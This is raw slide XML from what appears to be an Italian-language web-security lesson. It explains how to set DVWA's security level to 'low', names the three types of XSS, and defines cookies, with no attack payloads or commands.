                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>“password”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="435090" indent="-217545" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2821"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Accedere alla sezione di sicurezza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Una volta effettuato l'accesso, cerchiamo e clicchiamo sulla voce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>"DVWA Security"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel menu principale dell'applicazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="435090" indent="-217545" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2821"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Impostare il livello di sicurezza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nella pagina DVWA Security, troveremo un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>menu a tendina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per selezionare il livello di sicurezza. Selezioniamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>l'opzione "low"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> dal menu a tendina e clicchiamo su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per confermare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="435090" indent="-217545" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2821"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2015">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Se l'operazione è stata eseguita correttamente, vedremo il vostro nome utente e il livello di sicurezza "low" visualizzati in basso a sinistra dello schermo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2821"/>
              </a:lnSpc>
            </a:pP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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="2254251"/>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3 - XSS/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>XSS stored</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2</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8091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2059286" y="428495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552370"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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="333973" y="-185771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6" id="6"/>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750191" y="1017503"/>
            <a:ext cx="6044816" cy="8376481"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="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9" id="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0" id="1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1" id="1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2" id="1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3" id="1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4" id="1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5" id="1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6" id="1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7" id="1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8" id="1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TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1400972" y="362163"/>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3.1 - PANORAMICA XSS</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21" id="21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10037635" y="1400733"/>
            <a:ext cx="6131487" cy="2884223"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8175316" cy="3845631"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 22" id="22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="8175316" cy="3845631"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1868342" cy="878860"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 23" id="23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="false" flipV="false" rot="0">
                <a:off x="0" y="0"/>
                <a:ext cx="1868342" cy="878860"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="878860" w="1868342">
                    <a:moveTo>
                      <a:pt x="31566" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1836776" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1845148" y="0"/>
                      <a:pt x="1853177" y="3326"/>
                      <a:pt x="1859097" y="9246"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1865016" y="15165"/>
                      <a:pt x="1868342" y="23194"/>
                      <a:pt x="1868342" y="31566"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1868342" y="847293"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1868342" y="855665"/>
                      <a:pt x="1865016" y="863694"/>
                      <a:pt x="1859097" y="869614"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1853177" y="875534"/>
                      <a:pt x="1845148" y="878860"/>
                      <a:pt x="1836776" y="878860"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="31566" y="878860"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23194" y="878860"/>
                      <a:pt x="15165" y="875534"/>
                      <a:pt x="9246" y="869614"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3326" y="863694"/>
                      <a:pt x="0" y="855665"/>
                      <a:pt x="0" y="847293"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="31566"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="23194"/>
                      <a:pt x="3326" y="15165"/>
                      <a:pt x="9246" y="9246"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15165" y="3326"/>
                      <a:pt x="23194" y="0"/>
                      <a:pt x="31566" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="TextBox 24" id="24"/>
              <p:cNvSpPr txBox="true"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="-47625"/>
                <a:ext cx="1868342" cy="926485"/>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627471" y="378465"/>
              <a:ext cx="7085267" cy="3031552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPts val="3042"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2173">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo Bold"/>
                </a:rPr>
                <a:t>Es</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2173">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo Bold"/>
                </a:rPr>
                <a:t>istono tre principali tipi di XSS:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPts val="3042"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="just" marL="469186" indent="-234593" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3042"/>
                </a:lnSpc>
                <a:buAutoNum type="arabicPeriod" startAt="1"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2173">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2173">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo"/>
                </a:rPr>
                <a:t>Stored XSS (o Persistent XSS)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just" marL="469186" indent="-234593" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3042"/>
                </a:lnSpc>
                <a:buAutoNum type="arabicPeriod" startAt="1"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2173">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo"/>
                </a:rPr>
                <a:t> Reflected XSS (o Non-Persistent XSS)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just" marL="469186" indent="-234593" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3042"/>
                </a:lnSpc>
                <a:buAutoNum type="arabicPeriod" startAt="1"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2173">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo"/>
                </a:rPr>
                <a:t> DOM-based XSS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPts val="3042"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 26" id="26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8785047" y="6137154"/>
            <a:ext cx="7864923" cy="3121146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10486564" cy="4161529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 27" id="27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="10486564" cy="4161529"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2364902" cy="938497"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 28" id="28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="false" flipV="false" rot="0">
                <a:off x="0" y="0"/>
                <a:ext cx="2364902" cy="938497"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="938497" w="2364902">
                    <a:moveTo>
                      <a:pt x="24609" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2340293" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2346820" y="0"/>
                      <a:pt x="2353079" y="2593"/>
                      <a:pt x="2357694" y="7208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2362309" y="11823"/>
                      <a:pt x="2364902" y="18082"/>
                      <a:pt x="2364902" y="24609"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2364902" y="913888"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2364902" y="920414"/>
                      <a:pt x="2362309" y="926674"/>
                      <a:pt x="2357694" y="931289"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2353079" y="935904"/>
                      <a:pt x="2346820" y="938497"/>
                      <a:pt x="2340293" y="938497"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="24609" y="938497"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18082" y="938497"/>
                      <a:pt x="11823" y="935904"/>
                      <a:pt x="7208" y="931289"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2593" y="926674"/>
                      <a:pt x="0" y="920414"/>
                      <a:pt x="0" y="913888"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="24609"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="18082"/>
                      <a:pt x="2593" y="11823"/>
                      <a:pt x="7208" y="7208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11823" y="2593"/>
                      <a:pt x="18082" y="0"/>
                      <a:pt x="24609" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="TextBox 29" id="29"/>
              <p:cNvSpPr txBox="true"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="-47625"/>
                <a:ext cx="2364902" cy="986122"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr" rtlCol="false" tIns="50414" lIns="50414" bIns="50414" rIns="50414"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPts val="3080"/>
                  </a:lnSpc>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 30" id="30"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="624023" y="373886"/>
              <a:ext cx="9238519" cy="3347081"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3202"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2287">
                  <a:solidFill>
                    <a:srgbClr val="DC0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo Bold"/>
                </a:rPr>
                <a:t>Che cosa sono i cookie? </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2782"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPts val="2782"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1987">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo"/>
                </a:rPr>
                <a:t>I cookie sono piccoli file di testo memorizzati sul dispositivo di un utente da un sito web durante la navigazione. </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPts val="2782"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1987">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arimo"/>
                </a:rPr>
                <a:t>Servono a salvare informazioni come le preferenze dell'utente, le sessioni di accesso e i dati di tracciamento, facilitando una navigazione personalizzata e continua. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 31" id="31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5912518" y="1802365"/>
            <a:ext cx="4595913" cy="2298041"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2298041" w="4595913">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4595912" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4595912" y="2298041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2298041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-10997" r="0" b="-10997"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 32" id="32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5400000">
            <a:off x="13282766" y="4310573"/>
            <a:ext cx="3331585" cy="1665854"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1665854" w="3331585">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3331586" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3331586" y="1665854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1665854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-10997" r="0" b="-10997"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 33" id="33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10233973" y="6371884"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573839" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573839" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 34" id="34"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="1459406"/>
            <a:ext cx="5017563" cy="7320562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2773">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Gli XSS, o Cross-Site Scripting, sono una classe di vulnerabilità di sicurezza che colpiscono le applicazioni web. Permettono a un attaccante di iniettare script malevoli in pagine web visualizzate da altri utenti. Questi script possono eseguire operazioni dannose come:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3660"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="598723" indent="-299361" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3660"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2773">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>rubare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2773">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2773">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>, sessioni utente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="598723" indent="-299361" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3660"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2773">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>modificare il contenuto della pagina </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="598723" indent="-299361" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3660"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2773">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>reindirizzare l'utente a siti web malevoli.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 35" id="3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36" id="3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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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274276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100000">
            <a:off x="-1411998" y="6739892"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881396" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881396" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>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TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1681541"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3.1 - PANORAMICA XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1195860" y="1346082"/>
            <a:ext cx="5952358" cy="8248359"/>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2" id="1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8619811" y="3721255"/>
            <a:ext cx="9182684" cy="5222925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5222925" w="9182684">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9182684" y="0"/>
                </a:lnTo>
                <a:lnTo>
